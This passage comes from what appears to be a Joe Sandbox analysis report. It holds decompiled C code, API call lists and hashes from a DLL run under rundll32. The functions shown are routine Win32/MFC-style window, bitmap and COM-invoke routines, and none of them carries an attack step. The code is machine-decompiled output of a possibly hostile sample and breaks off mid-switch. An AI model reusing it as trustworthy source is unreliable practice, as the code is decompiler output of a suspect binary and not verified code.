                                                                        0x1002d5ee
                                                                        0x1002d5fb
                                                                        0x1002d5fb
                                                                        0x1002d60c
                                                                        0x1002d60f
                                                                        0x1002d615
                                                                        0x00000000
                                                                        0x1002d617
                                                                        0x1002d617
                                                                        0x00000000
                                                                        0x1002d617
                                                                        0x1002d615
                                                                        0x1002d435
                                                                        0x1002d435
                                                                        0x1002d43b
                                                                        0x1002d44e
                                                                        0x1002d44e
                                                                        0x1002d454
                                                                        0x1002d457
                                                                        0x1002d45c
                                                                        0x1002d489
                                                                        0x1002d48c
                                                                        0x1002d4b7
                                                                        0x1002d4d5
                                                                        0x1002d4e5
                                                                        0x1002d4ed
                                                                        0x1002d504
                                                                        0x1002d505
                                                                        0x1002d506
                                                                        0x1002d507
                                                                        0x1002d508
                                                                        0x1002d50b
                                                                        0x1002d50b
                                                                        0x1002d518
                                                                        0x1002d518
                                                                        0x1002d529
                                                                        0x1002d52c
                                                                        0x1002d532
                                                                        0x1002d538
                                                                        0x1002d538
                                                                        0x00000000
                                                                        0x1002d532
                                                                        0x1002d4b9
                                                                        0x1002d4be
                                                                        0x00000000
                                                                        0x1002d668
                                                                        0x1002d668
                                                                        0x1002d676
                                                                        0x1002d67b
                                                                        0x00000000
                                                                        0x1002d67b
                                                                        0x1002d4be
                                                                        0x1002d48e
                                                                        0x1002d4a0
                                                                        0x1002d4a3
                                                                        0x00000000
                                                                        0x1002d466
                                                                        0x1002d46f
                                                                        0x1002d471
                                                                        0x1002d476
                                                                        0x1002d478
                                                                        0x1002d478
                                                                        0x1002d483
                                                                        0x00000000
                                                                        0x1002d483
                                                                        0x1002d45c
                                                                        0x1002d6eb
                                                                        0x1002d6eb
                                                                        0x1002d6f1
                                                                        0x00000000
                                                                        0x1002d397

                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 1002D2FA
                                                                        • GetClientRect.USER32 ref: 1002D338
                                                                        • BeginDeferWindowPos.USER32(?), ref: 1002D365
                                                                        • GetWindowRect.USER32 ref: 1002D41B
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                        • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                        • EqualRect.USER32 ref: 1002D4DD
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                        • EqualRect.USER32 ref: 1002D5C0
                                                                        • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                        • SetRectEmpty.USER32(?), ref: 1002D717
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                        • String ID:
                                                                        • API String ID: 3160784657-0
                                                                        • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                        • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				void* _v16;
                                                                        				void* _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				signed int _t56;
                                                                        				struct HDC__* _t65;
                                                                        				struct HBITMAP__* _t66;
                                                                        				struct HDC__* _t70;
                                                                        				void* _t78;
                                                                        				int* _t80;
                                                                        				int _t81;
                                                                        				signed int _t84;
                                                                        				signed int _t89;
                                                                        				void* _t102;
                                                                        				struct HDC__* _t103;
                                                                        				BITMAPINFO* _t105;
                                                                        
                                                                        				_t53 = LoadResource(_a4, _a8);
                                                                        				_v20 = _t53;
                                                                        				if(_t53 == 0) {
                                                                        					return _t53;
                                                                        				}
                                                                        				_t54 = LockResource(_t53);
                                                                        				_t78 = _t54;
                                                                        				_v12 = _t78;
                                                                        				if(_t78 == 0) {
                                                                        					L17:
                                                                        					return _t54;
                                                                        				}
                                                                        				_t99 =  *_t78 + 0x40;
                                                                        				_t54 = E100107B6( *_t78 + 0x40);
                                                                        				_t105 = _t54;
                                                                        				if(_t105 == 0) {
                                                                        					L16:
                                                                        					goto L17;
                                                                        				} else {
                                                                        					E10011440(_t105, _t78, _t99);
                                                                        					_t102 = _t105 + _t105->bmiHeader;
                                                                        					_a8 = _a8 & 0x00000000;
                                                                        					do {
                                                                        						_t84 =  *(_t102 + _a8 * 4);
                                                                        						_t56 = 0;
                                                                        						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
                                                                        							_t56 = _t56 + 1;
                                                                        							if(_t56 < 4) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L12;
                                                                        						}
                                                                        						__eflags = _a12;
                                                                        						if(_a12 == 0) {
                                                                        							_t80 = 0x1003f064 + _t56 * 8;
                                                                        							_v8 = _t80;
                                                                        							_a4 = GetSysColor( *_t80) & 0x000000ff;
                                                                        							_a4 = GetSysColor( *_t80) << 8;
                                                                        							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
                                                                        							__eflags = _t89;
                                                                        							 *(_t102 + _a8 * 4) = _t89;
                                                                        						} else {
                                                                        							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
                                                                        							if(__eflags != 0) {
                                                                        								 *(_t102 + _a8 * 4) = 0xffffff;
                                                                        							}
                                                                        						}
                                                                        						L12:
                                                                        						_a8 = _a8 + 1;
                                                                        					} while (_a8 < 0x10);
                                                                        					_t103 = _t105->bmiHeader.biWidth;
                                                                        					_t81 = _t105->bmiHeader.biHeight;
                                                                        					_a4 = _t103;
                                                                        					_a8 = _t81;
                                                                        					_t65 = GetDC(0);
                                                                        					_a12 = _t65;
                                                                        					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
                                                                        					_v8 = _t66;
                                                                        					if(_t66 != 0) {
                                                                        						_t70 = CreateCompatibleDC(_a12);
                                                                        						_t81 = SelectObject;
                                                                        						_t103 = _t70;
                                                                        						_v16 = SelectObject(_t103, _v8);
                                                                        						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
                                                                        						SelectObject(_t103, _v16);
                                                                        						DeleteDC(_t103);
                                                                        					}
                                                                        					ReleaseDC(0, _a12);
                                                                        					_push(_t105);
                                                                        					E100107C8(_t81, _t103, _t105, 0);
                                                                        					FreeResource(_v20);
                                                                        					_t54 = _v8;
                                                                        					goto L16;
                                                                        				}
                                                                        			}


























                                                                        APIs
                                                                        • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                        • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                        • GetSysColor.USER32(00000000), ref: 1002B635
                                                                        • GetSysColor.USER32(00000000), ref: 1002B643
                                                                        • GetSysColor.USER32(00000000), ref: 1002B658
                                                                        • GetDC.USER32(00000000), ref: 1002B68A
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                        • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                        • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                        • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                        • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                        • ReleaseDC.USER32 ref: 1002B6FF
                                                                        • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2552574679-0
                                                                        • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                        • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
                                                                        				char _v8;
                                                                        				signed char _v12;
                                                                        				char _v20;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr* _t14;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t19;
                                                                        				_Unknown_base(*)()* _t23;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				void* _t28;
                                                                        				struct HINSTANCE__* _t31;
                                                                        				void* _t33;
                                                                        
                                                                        				_t28 = 0;
                                                                        				_t33 =  *0x1004f824 - _t28; // 0x0
                                                                        				if(_t33 != 0) {
                                                                        					L6:
                                                                        					_t13 =  *0x1004f830; // 0x0
                                                                        					if(_t13 == 0) {
                                                                        						L14:
                                                                        						_t14 =  *0x1004f828; // 0x0
                                                                        						if(_t14 != 0) {
                                                                        							_t28 =  *_t14();
                                                                        							if(_t28 != 0) {
                                                                        								_t17 =  *0x1004f82c; // 0x0
                                                                        								if(_t17 != 0) {
                                                                        									_t28 =  *_t17(_t28);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L18:
                                                                        						return  *0x1004f824(_t28, _a4, _a8, _a12);
                                                                        					}
                                                                        					_t19 =  *_t13();
                                                                        					if(_t19 == 0) {
                                                                        						L10:
                                                                        						if( *0x1004f3ec < 4) {
                                                                        							_a14 = _a14 | 0x00000004;
                                                                        						} else {
                                                                        							_a14 = _a14 | 0x00000020;
                                                                        						}
                                                                        						goto L18;
                                                                        					}
                                                                        					_push( &_v8);
                                                                        					_push(0xc);
                                                                        					_push( &_v20);
                                                                        					_push(1);
                                                                        					_push(_t19);
                                                                        					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t31 = LoadLibraryA("user32.dll");
                                                                        				if(_t31 == 0) {
                                                                        					L12:
                                                                        					return 0;
                                                                        				}
                                                                        				_t23 = GetProcAddress(_t31, "MessageBoxA");
                                                                        				 *0x1004f824 = _t23;
                                                                        				if(_t23 == 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
                                                                        					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
                                                                        					if( *0x1004f3e0 == 2) {
                                                                        						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
                                                                        						 *0x1004f834 = _t26;
                                                                        						if(_t26 != 0) {
                                                                        							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
                                                                        						}
                                                                        					}
                                                                        					goto L6;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad
                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                        • API String ID: 2238633743-1612076079
                                                                        • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                        • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 48%
                                                                        			E10039B26(intOrPtr __ecx) {
                                                                        				signed int __ebx;
                                                                        				signed int __edi;
                                                                        				CHAR* __esi;
                                                                        				signed int _t161;
                                                                        				signed int _t164;
                                                                        				intOrPtr* _t170;
                                                                        				signed int _t172;
                                                                        				signed int _t174;
                                                                        				signed int _t178;
                                                                        				void* _t192;
                                                                        				signed short _t203;
                                                                        				signed int _t204;
                                                                        				signed int _t205;
                                                                        				signed int* _t207;
                                                                        				signed int _t209;
                                                                        				void* _t213;
                                                                        				signed int _t214;
                                                                        				signed int _t217;
                                                                        				signed short* _t224;
                                                                        				void* _t233;
                                                                        				CHAR* _t235;
                                                                        				signed int _t236;
                                                                        				intOrPtr* _t237;
                                                                        				void* _t238;
                                                                        				void* _t239;
                                                                        				signed short _t242;
                                                                        				signed int _t243;
                                                                        				intOrPtr _t244;
                                                                        				signed short* _t245;
                                                                        				signed int** _t246;
                                                                        				void* _t247;
                                                                        				void* _t249;
                                                                        				void* _t250;
                                                                        				void* _t253;
                                                                        				void* _t263;
                                                                        
                                                                        				E10011BF0(0x1003b377, _t247);
                                                                        				_t250 = _t249 - 0x60;
                                                                        				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
                                                                        				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
                                                                        				_t214 = 0;
                                                                        				 *(_t247 - 0x20) = _t161;
                                                                        				if( *((intOrPtr*)(__ecx)) != 0) {
                                                                        					E10011C50(_t247 - 0x4c, 0, 0x10);
                                                                        					_t235 =  *(_t247 + 0x18);
                                                                        					_t253 = _t250 + 0xc;
                                                                        					if(_t235 == 0) {
                                                                        						_t164 =  *(_t247 - 0x44);
                                                                        					} else {
                                                                        						_t164 = lstrlenA(_t235);
                                                                        						 *(_t247 - 0x44) = _t164;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
                                                                        					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
                                                                        						 *((intOrPtr*)(_t247 - 0x40)) = 1;
                                                                        						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
                                                                        					}
                                                                        					if(_t164 != _t214) {
                                                                        						_t244 = E1001F77E(_t164 << 4);
                                                                        						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
                                                                        						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
                                                                        						_t253 = _t253 + 0x10;
                                                                        						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
                                                                        						 *(_t247 - 0x14) = _t235;
                                                                        						 *(_t247 - 0x10) = _t245;
                                                                        						if( *_t235 != 0) {
                                                                        							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
                                                                        							_t246 =  &(_t245[4]);
                                                                        							_t22 = _t200 - 4; // 0xfffffff9
                                                                        							_t217 = _t22;
                                                                        							 *(_t247 - 0x18) = _t246;
                                                                        							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
                                                                        							_t238 = 4;
                                                                        							do {
                                                                        								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
                                                                        								_t224 =  *(_t247 - 0x10);
                                                                        								 *_t224 = _t203;
                                                                        								if((_t203 & 0x00000040) != 0) {
                                                                        									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
                                                                        								}
                                                                        								_t204 =  *_t224 & 0x0000ffff;
                                                                        								_t263 = _t204 - 0x4002;
                                                                        								if(_t263 > 0) {
                                                                        									_t205 = _t204 - 0x4003;
                                                                        									__eflags = _t205 - 0x12;
                                                                        									if(_t205 <= 0x12) {
                                                                        										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
                                                                        											case 0:
                                                                        												goto L36;
                                                                        											case 1:
                                                                        												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                        												_t217 = _t217 + _t238;
                                                                        												_t207 =  *_t217;
                                                                        												asm("sbb ecx, ecx");
                                                                        												 *_t207 =  ~( *_t207) & 0x0000ffff;
                                                                        												goto L37;
                                                                        											case 2:
                                                                        												goto L38;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									if(_t263 == 0) {
                                                                        										L36:
                                                                        										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                        										_t217 = _t217 + _t238;
                                                                        										__eflags = _t217;
                                                                        										_t207 =  *_t217;
                                                                        										L37:
                                                                        										 *_t246 = _t207;
                                                                        									} else {
                                                                        										_t209 = _t204;
                                                                        										if(_t209 <= 0x13) {
                                                                        											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
                                                                        												case 0:
                                                                        													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                        													_t217 = _t217 + _t238;
                                                                        													_t210 =  *_t217;
                                                                        													goto L16;
                                                                        												case 1:
                                                                        													goto L36;
                                                                        												case 2:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                        													__eax =  *(__ebp + 0x1c);
                                                                        													__ebx = __ebx + 8;
                                                                        													 *__esi =  *( *(__ebp + 0x1c));
                                                                        													goto L38;
                                                                        												case 3:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                        													__eax =  *(__ebp + 0x1c);
                                                                        													__ebx = __ebx + 8;
                                                                        													 *__esi =  *( *(__ebp + 0x1c));
                                                                        													goto L38;
                                                                        												case 4:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													__eflags = __ebx;
                                                                        													__eax =  *__ebx;
                                                                        													__ecx =  *__eax;
                                                                        													goto L22;
                                                                        												case 5:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													__eax =  *__ebx;
                                                                        													_push(__eax);
                                                                        													 *(__ebp - 0x18) = __eax;
                                                                        													__imp__#2();
                                                                        													__eflags =  *(__ebp - 0x18);
                                                                        													 *__esi = __eax;
                                                                        													if( *(__ebp - 0x18) != 0) {
                                                                        														__eflags = __eax;
                                                                        														if(__eax == 0) {
                                                                        															goto L25;
                                                                        														}
                                                                        													}
                                                                        													goto L38;
                                                                        												case 6:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													 *__ebx =  ~( *__ebx);
                                                                        													asm("sbb eax, eax");
                                                                        													L16:
                                                                        													 *_t246 = _t210;
                                                                        													goto L38;
                                                                        												case 7:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                        													__edi =  *(__ebp - 0x10);
                                                                        													__ebx = __ebx + 4;
                                                                        													__esi =  *__ebx;
                                                                        													asm("movsd");
                                                                        													asm("movsd");
                                                                        													asm("movsd");
                                                                        													asm("movsd");
                                                                        													__esi =  *(__ebp - 0x18);
                                                                        													_push(4);
                                                                        													_pop(__edi);
                                                                        													goto L38;
                                                                        												case 8:
                                                                        													L26:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													__eax =  *__ebx;
                                                                        													__eflags = __eax;
                                                                        													 *(__ebp - 0x18) = __eax;
                                                                        													if(__eax != 0) {
                                                                        														__eax = lstrlenA( *(__ebp - 0x18));
                                                                        														__eax = __eax + 1;
                                                                        														 *(__ebp - 0x24) = __eax;
                                                                        														__eax = __eax + __eax;
                                                                        														__eax = __eax + 3;
                                                                        														__eax = __eax & 0xfffffffc;
                                                                        														__eflags = __eax;
                                                                        														__eax = __esp;
                                                                        														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
                                                                        													}
                                                                        													_push(__eax);
                                                                        													__imp__#2();
                                                                        													__eflags =  *(__ebp - 0x18);
                                                                        													 *__esi = __eax;
                                                                        													if( *(__ebp - 0x18) != 0) {
                                                                        														__eflags = __eax;
                                                                        														if(__eax == 0) {
                                                                        															L25:
                                                                        															__eax = E1001CE3B(__ecx);
                                                                        															goto L26;
                                                                        														}
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x10);
                                                                        													 *( *(__ebp - 0x10)) = 8;
                                                                        													goto L38;
                                                                        												case 9:
                                                                        													goto L38;
                                                                        												case 0xa:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													 *__esi =  *__ebx;
                                                                        													goto L38;
                                                                        												case 0xb:
                                                                        													__eax =  *(__ebp + 0x1c);
                                                                        													__eax =  *(__ebp + 0x1c) + 8;
                                                                        													__ecx =  *__eax;
                                                                        													 *(__ebp + 0x1c) = __eax;
                                                                        													__ebx = __ebx + 8;
                                                                        													L22:
                                                                        													 *__esi = __ecx;
                                                                        													__esi[4] = __eax;
                                                                        													goto L38;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								L38:
                                                                        								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
                                                                        								_t246 = _t246 - 0x10;
                                                                        								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
                                                                        								 *(_t247 - 0x18) = _t246;
                                                                        							} while ( *( *(_t247 - 0x14)) != 0);
                                                                        							_t235 =  *(_t247 + 0x18);
                                                                        							_t214 = 0;
                                                                        						}
                                                                        					}
                                                                        					_t242 = 0;
                                                                        					E10010592(_t247 - 0x3c);
                                                                        					if( *(_t247 + 0x10) != _t214) {
                                                                        						_t242 = _t247 - 0x3c;
                                                                        					}
                                                                        					E10011C50(_t247 - 0x6c, _t214, 0x20);
                                                                        					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
                                                                        					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
                                                                        					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
                                                                        					_t172 =  *(_t247 - 0x44);
                                                                        					if(_t172 != _t214) {
                                                                        						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
                                                                        						_t242 = _t235;
                                                                        						if( *_t235 != 0) {
                                                                        							do {
                                                                        								_t192 =  *_t242;
                                                                        								if(_t192 == 8 || _t192 == 0xe) {
                                                                        									__imp__#9(_t214);
                                                                        								}
                                                                        								_t214 = _t214 - 0x10;
                                                                        								_t242 = _t242 + 1;
                                                                        								_t273 =  *_t242;
                                                                        							} while ( *_t242 != 0);
                                                                        						}
                                                                        					}
                                                                        					_push( *((intOrPtr*)(_t247 - 0x4c)));
                                                                        					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
                                                                        					_pop(_t221);
                                                                        					if( *(_t247 + 0x18) >= 0) {
                                                                        						L63:
                                                                        						_t242 =  *(_t247 + 0x10);
                                                                        						__eflags = _t242;
                                                                        						if(_t242 != 0) {
                                                                        							__eflags = _t242 - 0xc;
                                                                        							if(_t242 != 0xc) {
                                                                        								_t174 = _t247 - 0x3c;
                                                                        								__imp__#12(_t174, _t174, 0, _t242);
                                                                        								_t236 = _t174;
                                                                        								__eflags = _t236;
                                                                        								if(_t236 < 0) {
                                                                        									__imp__#9(_t247 - 0x3c);
                                                                        									_push(_t236);
                                                                        									goto L67;
                                                                        								}
                                                                        							}
                                                                        							goto L68;
                                                                        						}
                                                                        					} else {
                                                                        						__imp__#9(_t247 - 0x3c);
                                                                        						if( *(_t247 + 0x18) == 0x80020009) {
                                                                        							__eflags =  *(_t247 - 0x54);
                                                                        							if( *(_t247 - 0x54) != 0) {
                                                                        								 *(_t247 - 0x54)(_t247 - 0x6c);
                                                                        							}
                                                                        							_t178 = E1001F77E(0x20);
                                                                        							_pop(_t221);
                                                                        							 *(_t247 + 0x14) = _t178;
                                                                        							__eflags = _t178;
                                                                        							 *(_t247 - 4) = 0;
                                                                        							if(__eflags == 0) {
                                                                        								_t243 = 0;
                                                                        								__eflags = 0;
                                                                        							} else {
                                                                        								_push( *((intOrPtr*)(_t247 - 0x6c)));
                                                                        								_t221 = _t178;
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t243 = E10039A54(_t178, __eflags);
                                                                        							}
                                                                        							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
                                                                        							__eflags =  *(_t247 - 0x68);
                                                                        							_t237 = __imp__#6;
                                                                        							if( *(_t247 - 0x68) != 0) {
                                                                        								_t113 = _t243 + 0x18; // 0x18
                                                                        								_t221 = _t113;
                                                                        								E1000860E(_t113,  *(_t247 - 0x68));
                                                                        								 *_t237( *(_t247 - 0x68));
                                                                        							}
                                                                        							__eflags =  *(_t247 - 0x64);
                                                                        							if( *(_t247 - 0x64) != 0) {
                                                                        								_t117 = _t243 + 0xc; // 0xc
                                                                        								_t221 = _t117;
                                                                        								E1000860E(_t117,  *(_t247 - 0x64));
                                                                        								 *_t237( *(_t247 - 0x64));
                                                                        							}
                                                                        							__eflags =  *(_t247 - 0x60);
                                                                        							if( *(_t247 - 0x60) != 0) {
                                                                        								_t121 = _t243 + 0x14; // 0x14
                                                                        								_t221 = _t121;
                                                                        								E1000860E(_t121,  *(_t247 - 0x60));
                                                                        								 *_t237( *(_t247 - 0x60));
                                                                        							}
                                                                        							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
                                                                        							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
                                                                        							 *(_t247 + 0x14) = _t243;
                                                                        							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
                                                                        							goto L63;
                                                                        						} else {
                                                                        							_push( *(_t247 + 0x18));
                                                                        							L67:
                                                                        							E100387D9(_t221);
                                                                        							L68:
                                                                        							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
                                                                        							if(_t161 <= 0x13) {
                                                                        								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
                                                                        									case 0:
                                                                        										__eax =  *(__ebp + 0x14);
